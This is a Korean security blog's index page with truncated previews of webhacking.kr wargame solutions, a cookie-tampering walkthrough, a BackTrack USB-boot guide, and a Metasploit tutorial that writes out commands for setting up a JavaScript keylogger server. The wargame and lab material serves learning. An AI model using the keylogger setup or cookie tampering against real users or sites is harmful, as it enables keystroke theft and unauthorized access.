본문 바로가기

webhacking.kr 6번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur 에게 있지 않습니다. 더보기
webhacking.kr 15번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur 에게 있지 않습니다. 더보기
webhacking.kr 16번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur에게 있지 않습니다. 더보기
webhacking.kr 18번 문제 풀이 본 PDF 파일의 저작권은 저에게 있지 않습니다. 더보기
webhacking.kr 20번 문제 풀이 본 PDF 파일의 저작권은 M1S Secur에게 있지 않습니다. 더보기
webhacking.kr 24번 문제 풀이 본 PDF 파일의 저작권은 저에게 있지 않습니다. 더보기
webhacking.kr 26번 문제 풀이 본 PDF 파일의 저작권은 저에게 있지 않습니다. 더보기
[1]Webhacking.kr (Challenge 1) 안녕하세요. M1S Secur입니다. 오늘은 Webhacking.kr의 1번문제를 풀이할건데요. 그럼 시작하겠습니다. 자 첫번째 문제화면입니다. 그냥 검은색바탕에 저런 문구만 표시되어있군요? 저기보이는 index.phps를 클릭해서 소스를 확인해봅시다. 이렇게 소스가 나와있군요? 쿠키가 나와있는걸보니 쿠키관련 해키예제인것 같군요. 아랫부분의 php코드를 살펴봅시다. 먼저 패스워드는 ????라는군요? 아직 알수가 없습니다. 만약 쿠키 즉 유저의 레벨이 5보다 크다면 문제가 풀린다는군요. 그럼 쿠키를 변조하기위해 쿡시 툴바를 사용해봅시다. 쿡시툴바를 사용해 쿠키를 확인해보면 유저레벨이 5보다 크지 않군요. 간단하게 5.5정도로 설정하고 set을 눌러봅시다. 축하한다며 문제가 풀리는군요. 간단한 쿠키 예제입니.. 더보기
키로거, 자바스크립트 예제, 백트랙편 안녕하세요M1S Secur입니다이번강의는 메타스플로잇을 활용합니다원래 메타스플로잇으로 합니다 이번 키로거는 상대방에게 하는것이아닌 키로거의 쾌감을느낄수있는 그런 강의입니다자 시작하겠습니다 백트랙 터미널을 열고 메타스플로잇을 준비해야합니다# msfconsole몇초후에 메타스플로잇창이 뜹니다#msf> use auxiliary/server/capture/http_javascript_keylogger이 강의는 자바스크립트를 이용한 키로거니 서버를 사용해야합니다그리고 이어서 명령어를입력합니다> show options>set demo true> set SRVPORT 4444> set SRVHOST 아이피> set URIPATH 별명>exploit-------명령어 입력은 끝났습니다 이제 파이어폭스를 켜주고 http.. 더보기
백트랙 USB부팅 안녕하세요 M1S Secur입니다 http://www.pendrivelinux.com/ 이링크로들어가 받아주세요 ㅎUniversal USB Installer를 다운해주세요 자 준비되셨을거라 믿고 시작합니다컴퓨터를키고 Universal USB를 설치하신후 이 창이뜨면 맨위빈칸을 backtrack 5로 맞춰주신후 그 밑엔 backtrack5 iso파일을 찾아넣어주세요 그리고 맨밑에는 최고한도로올려주시구요 그리고 다음키를눌러주시면 이상한 경고창이뜰겁니다 가뿐히 '예'를눌러주시구요 누르신다음 로딩창이뜰겁니다 프로세스 시작, 적용중이구요 그게 끝나셨다면! 이제 컴퓨터를 재부팅해주세요 ※USB 장착한상태로요 ㅎ재부팅동안 F10을연타해줍니다(컴퓨터마다 다릅니다 부팅메뉴 f11, del ) 그러면 이런창이뜹니다 이창을.. 더보기